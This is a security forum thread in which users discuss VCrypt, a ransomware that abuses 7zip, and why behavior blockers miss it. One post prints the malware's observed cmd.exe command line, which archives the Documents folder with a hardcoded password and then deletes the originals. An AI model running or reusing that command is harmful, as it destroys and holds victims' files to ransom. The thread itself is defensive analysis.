CyberTech

Level 32
Verified
A new ransomware called VCrypt is targeting French victims by utilizing the legitimate 7zip command-line program to create password-protected archives of data folders.

BleepingComputer was told today about a new ransomware that was deleting all of a victim's files found in Windows data folders and then creating new "encrypted" files named after the folder name.

These encrypted files would utilize a naming format of username_foldername.vxcrypt.

For example, the files in the Documents folder would be deleted, and a file named User_documents.vcrypt would be created, as shown in the image below.
 

MacDefender

Level 12
Verified
Well now it begins..... I wonder if some AV vendors are finding their statements a bit ironic about how TrojanZipperPOC and Ransominator are not realistic.

I sincerely hope that this evolved organically and our attempts to demonstrate a common behavior blocker weakness did not inspire real malware writers.

Unfortunately very very few AVs correctly identify this kind of an attack because most behavior blockers just look at the offending process (7zip in this case) and consider it trusted/whitelisted, as opposed to the whole chain of events that led to 7zip being started, or what exactly 7zip was told to do.
 

MacDefender

Level 12
Verified
FWIW, luckily, this ransomware is very poorly and dumbly coded:

Code:
2480 - C:\Windows\system32\cmd.exe /c if exist %USERPROFILE%\Documents\ for /F %i in (dir /b "%USERPROFILE%\\Documents\\*.*") do %TEMP%\mod_01.exe a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS %USERPROFILE%\%username%_documents.vcrypt %USERPROFILE%\Documents\* & del /f /s /q %USERPROFILE%\Documents\ & FOR /D %p IN (%USERPROFILE%\Documents\*) do rmdir %p /s /q

It uses a batch file and the del command to delete the documents. If they wanted to be smart, they'd use the "-sdel" argument to 7za. Attempting to directly delete the user's documents without abusing a whitelisted process triggers most behavior blockers that are able to AMSI inspect batch files.
 
Last edited:

geminis3

Level 16
Verified
Malware Tester
Last edited:

struppigel

Moderator
Verified
Staff member
Well now it begins..... I wonder if some AV vendors are finding their statements a bit ironic about how TrojanZipperPOC and Ransominator are not realistic.

Who said it is unrealistic? Zip abusing ransomware has been around for years, before those PoCs.

also written in C 🤔
EDIT: looks like a cybercriminal recreated my PoC and removed the need for a local 7zip copy

The main code is a batch script.
 

MacDefender

Level 12
Verified
Who said it is unrealistic? Zip abusing ransomware has been around for years, before those PoCs.

I believe it was ESET or maybe another vendor. Basically they brushed off the proof of concept as not realistic because users archive their files using 7Zip too, or something along those lines. Either way it was a fairly dismissive analysis of a real problem I was trying to demonstrate, which is a lot of behavior blockers turn a blind eye if you have a trusted process be the last agent to modify and delete your documents.
 
Well now it begins..... I wonder if some AV vendors are finding their statements a bit ironic about how TrojanZipperPOC and Ransominator are not realistic.

I sincerely hope that this evolved organically and our attempts to demonstrate a common behavior blocker weakness did not inspire real malware writers.

Unfortunately very very few AVs correctly identify this kind of an attack because most behavior blockers just look at the offending process (7zip in this case) and consider it trusted/whitelisted, as opposed to the whole chain of events that led to 7zip being started, or what exactly 7zip was told to do.
As an idea, maybe for people with AVs that can have different levels of restriction (Kaspersky has it, I guess other AVs also), making 7z to allow just 1 folder access, like downloads folder. Then would just encrypt that folder in case of attack o_O

Might not be perfect, but I guess it would make the job :unsure: